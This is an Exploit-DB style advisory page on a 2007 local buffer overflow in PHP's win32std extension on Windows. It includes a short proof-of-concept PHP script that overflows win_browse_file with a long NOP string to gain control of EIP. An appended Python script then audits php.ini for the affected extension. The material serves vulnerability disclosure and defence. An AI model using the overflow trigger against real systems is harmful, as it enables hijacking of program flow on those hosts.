vendor: PHP
by: boecke
CVSS: N/A
MEDIUM
Buffer Overflow
CWE: Unknown
Product Name: PHP
Affected Version From: <= 5.2.0
Affected Version To: <= 5.2.0
Patch Exists: NO
Related CWE: Unknown
CPE: php_win32sti.dll
Metasploit:
Other Scripts:
Platforms Tested: Windows
2007

php_win32sti.dll PHP <= 5.2.0 (win32) Buffer Overflow

The php_win32sti.dll extension in PHP versions <= 5.2.0 for win32 contains a local buffer overflow. The EDX and EIP registers can be controlled, which gives the potential to dictate program flow.

Mitigation:


Exploit-DB raw data:

<?php
// ==================================================================================
//
//        php_win32sti.dll PHP <= 5.2.0 (win32) Buffer Overflow
//
//		[x] Discovery: boecke <boecke@herzeleid.net>
//		[x] Risk: Local Buffer Overflow (Medium - High Risk)
//		[x] Notes: EDX and EIP are able to be controlled and therefore
//			     have the potential to dictate program flow.
//
//		[x] "Sangre, sonando, de rabia naci.. Who do you trust?"
//
// ==================================================================================

if ( !extension_loaded("win32std") )
{
	die;
}

win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );

?>

# milw0rm.com [2007-08-18]
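
An added defensive check, not part of the original advisory or the author's code: since the page lists no patch, a practical step is to find installs where the extension is enabled. This Python example parses php.ini text for active `extension=` lines naming the modules mentioned on this page and applies the page's stated version range; the function names and the sample ini are constructed for illustration.

```python
import re

# Module names from this page: the script above checks for "win32std",
# the advisory title names php_win32sti.dll.
FLAGGED = {"win32std", "win32sti"}

# Active php.ini directive: extension=<name or path>, optionally quoted/commented.
_DIRECTIVE = re.compile(r'^\s*extension\s*=\s*"?([^";]+?)"?\s*(?:;.*)?$', re.IGNORECASE)

def extension_name(value):
    """Reduce a php.ini extension value to its bare module name."""
    base = re.split(r"[\\/]", value.strip())[-1].lower()
    base = re.sub(r"\.(dll|so)$", "", base)
    return base[4:] if base.startswith("php_") else base

def loaded_extensions(ini_text):
    """Return module names enabled by active (uncommented) extension= lines."""
    names = []
    for line in ini_text.splitlines():
        if line.lstrip().startswith((";", "#", "[")):
            continue  # comment or section header
        m = _DIRECTIVE.match(line)
        if m:
            names.append(extension_name(m.group(1)))
    return names

def version_affected(version):
    """True when the PHP version is <= 5.2.0, the range stated on this page."""
    nums = tuple(int(n) for n in re.findall(r"\d+", version.split("-")[0])[:3])
    return nums + (0,) * (3 - len(nums)) <= (5, 2, 0)

def audit(ini_text, version):
    """Return flagged extensions enabled on a PHP version in the stated range."""
    if not version_affected(version):
        return []
    return sorted(set(loaded_extensions(ini_text)) & FLAGGED)

# Constructed sample php.ini, not taken from a real host.
SAMPLE_INI = r'''
[PHP]
extension_dir = "C:\php\ext"
extension=php_mysql.dll
;extension=php_win32sti.dll
extension = "C:\php\ext\php_win32std.dll"  ; added for the desktop tool
'''

if __name__ == "__main__":
    print(audit(SAMPLE_INI, "5.2.0"))
```

A non-empty result means the extension should be disabled in php.ini (comment out the `extension=` line) unless it is strictly required.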